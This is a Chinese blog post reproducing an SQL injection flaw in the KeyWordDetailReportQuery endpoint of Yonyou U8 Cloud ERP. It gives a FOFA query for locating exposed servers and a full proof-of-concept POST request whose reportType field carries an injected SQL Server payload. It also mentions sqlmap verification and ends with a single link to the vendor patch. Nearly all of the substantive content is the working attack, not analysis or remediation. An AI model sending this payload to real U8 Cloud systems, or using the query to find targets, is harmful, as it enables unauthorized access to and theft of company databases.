用友U8 cloud KeyWordDetailReportQuery存在sql注入漏洞

最新推荐文章于 2024-08-25 22:36:40 发布
最新推荐文章于 2024-08-25 22:36:40 发布
阅读量657 收藏 10
点赞数 8
分类专栏: 漏洞复现 文章标签: sql 数据库 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/135268293
版权

产品简介

用友U8 Cloud 提供企业级云ERP整体解决方案,全面支持多组织业务协同,实现企业互联网资源连接。 U8 Cloud 亦是亚太地区成长型企业最广泛采用的云解决方案。

漏洞概述

用友U8 Cloud KeyWordDetailReportQuery接口处存在 sql漏洞,攻击者可通过该漏洞获取数据库中的敏感信息。

指纹识别

fofa:

app="用友-U8-Cloud"

漏洞利用

poc:

POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Length: 207
Accept: */*
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Accept-Language: zh-CN,zh;q=0.8
Cache-Control: max-age=0
Connection: keep-alive
Content-Type: application/json
Accept-Encoding: gzip
Connection: close
SL-CE-SUID: 29

{"reportType": "' AND 2780 IN (select sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))) AND 'njGF'='njGF", "usercode": "18701014496", "keyword": [{"keywordPk": "1", "keywordValue": "1", "keywordIndex": 1}]}

查询12346的md5值
在这里插入图片描述
sqlmap验证
在这里插入图片描述

修复建议

用友安全中心已经发布相关补丁
https://security.yonyou.com/#/patchInfo?identifier=f3fd4862ca2f45b3803ac48df08ace98

【江湖传闻多半名不符实,赢的人显威风,输的人爱面子,难免夸大些。】

3tefanie丶zhou
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
用友U8 cloud KeyWordDetailReportQuery SQL注入漏洞复现
0xSec
12-28 877
用友U8 cloud KeyWordDetailReportQuery 接口处存在SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,从而盗取用户数据,造成用户信息泄露。
用友U8Cloud总账模块概述
05-30
### 用友U8Cloud总账模块概述 #### 一、引言 用友U8Cloud作为一款面向中型及成长型企业市场的云ERP产品,旨在帮助企业实现数字化转型,提升管理效率与决策质量。其中,总账模块是财务管理的核心组成部分,承担着...
用友U8_Cloud-base64存在SQL注入漏洞
qq_36334672的博客
04-03 457
​ 用友-U8-Cloud-base64接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
用友U8 Cloud KeyWordDetailReportQuery sql注入漏洞
Keepb1ue的博客
12-28 1911
用友U8cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型、集团型企业,提供企业级云ERP整体解决方案。
U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析
qq_42067124的博客
12-28 666
U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析
用友U8 Cloud ReportDetailDataQuery SQL注入漏洞复现(QVD-2023-47860)
0xSec
02-05 719
用友U8 cloud ReportDetailDataQuery接口处存在SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,从而盗取用户数据,造成用户信息泄露。
用友U8 CLOUD 数据集成方案
05-11
用友U8 CLOUD 数据集成方案,外部数据交换平台主要用于外部系统和 U8 cloud 系统进行集成。利用外部数据交换平台, 可以将外系统的基本档案和业务数据发送到 U8 cloud 系统中,并进行相关的业务操作,如审 批、弃审...
用友U8常用的SQL语句查询.sql
04-21
用友U8系统运维经常用到的SQL语句,可以查询总账、出入库明细报表
用友U8 cloud V1.0-持久层技术红皮书.pdf
02-16
### 用友U8 cloud V1.0-持久层技术红皮书 #### 一、前言 在当今数字化转型的大背景下,企业级应用软件的需求日益增长,其中ERP(Enterprise Resource Planning,企业资源规划)系统作为核心管理工具之一,其性能与...
PostgreSQL案例:planning time超长问题分析
liuzhilong的博客
08-21 967
库总是OOM,分析到是执行计划生成有问题,planning time 1秒,planning shared hit 100w。一通分析,定位到是统计信息基表pg_statistic膨胀,由于会话首次SQL执行时的CatCacheMiss,导致backend访问并缓存了pg_statistic过多的死元组数据。应用连接总会启用新会话,多个backend的总内存过大从而导致OOM。
PostgreSQL:后端开发者的瑞士军刀
m0_52796585的博客
08-25 1260
PostgreSQL是一个功能丰富、高度可扩展的数据库系统,它为后端开发者提供了强大的工具来构建复杂的数据解决方案。从基础的SQL操作到高级的性能优化和安全特性,PostgreSQL都是后端开发者的可靠伙伴。随着你在使用PostgreSQL的过程中不断学习和实践,你会发现它是一个真正的瑞士军刀,能够满足你在后端开发中的各种需求。
HeidiSQL中一些简单mysql语句的含义(一)
2201_75345199的博客
08-23 534
创建一个数据库,这个是数据库的名字叫java62#删除数据库java62#查看当前mysql里的所有数据库#创建student表,varchar括号里的是字符串的长度#查看当前数据库里有哪些表#删除student表。
mybatis拦截器打印完整带参数sql,可直接放入数据库工具执行
apply_bomb的博客
08-25 218
如果你使用的是mybatisplus,那至少有3种方法打印sql, 如下博客。
关于超长字符串/文本对应的数据从excel导入到PL/SQL中的尝试
最新发布
qq_44835418的博客
08-25 108
时, clob会自动把类型转换为varchar2(4000)类型,也就是clob字段使用insert into时也会限制字节数不超过4000, 而如果手动粘贴复制时,则不存在限制4000字节的问题。因为想了好久,也不能在python脚本中将读取到的CLOB类型长文本数据变成可以全部保留数据的格式生成对应的sql代码,所以我选择了截取不超过4000的部分的数据来生成INSERT INTO代码, 然后再去PL/SQL上执行SQL, 然后看看那些有被截取, 被截取的我在手动的复制粘贴补充完整。
如何合理设置PostgreSQL的`max_connections`参数
分享关于Java编程、数据库管理和信息安全方面的最佳实践
08-21 1294
合理设置需要综合考虑系统的硬件资源、应用程序的需求以及数据库的实际负载。通过精确的计算和参数调整,可以确保数据库在高并发情况下依然稳定、高效地运行。此外,持续监控和优化是确保设置合理的关键步骤。在实际操作中,应结合具体业务需求和负载测试结果,灵活调整,以更好地管理数据库资源,优化整体性能。
[mysql][sql]mysql查询表大小
一名不太专业的程序员
08-21 403
表中选择特定数据库(在这个例子中是名为 'crawleroocllisten' 的数据库)的表信息。查询结果包括数据库名、表名、表中的记录数以及数据和索引所占用的空间容量(单位为MB)。这个查询通常用于数据库管理,帮助管理员了解数据库中各个表的大小和记录数,以便进行优化和维护。函数来将数据和索引长度除以1024两次(将字节转换为MB),并且保留两位小数。SQL 查询语句,用于从。
Python - sqlparse 解析库的基础使用
weixin_43497876的博客
08-21 198
这样就显示已经安装好了。
SQL Server数据库查询常用语句汇总
强者征服今天,懦夫哀叹昨天,懒汉坐等明天。
08-21 425
这里,汇总了在使用SQL Server数据库的过程中经常会写的查询语句。
用友U8 CLOUD数据集成方案详解
"用友U8 CLOUD 数据集成方案提供了外部数据交换平台,实现了外部系统与U8 CLOUD之间的数据交互。此方案支持数据导入和导出,采用XML作为统一的数据交换标准,具有面向服务的架构,允许灵活配置和自由扩充。外部系统...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值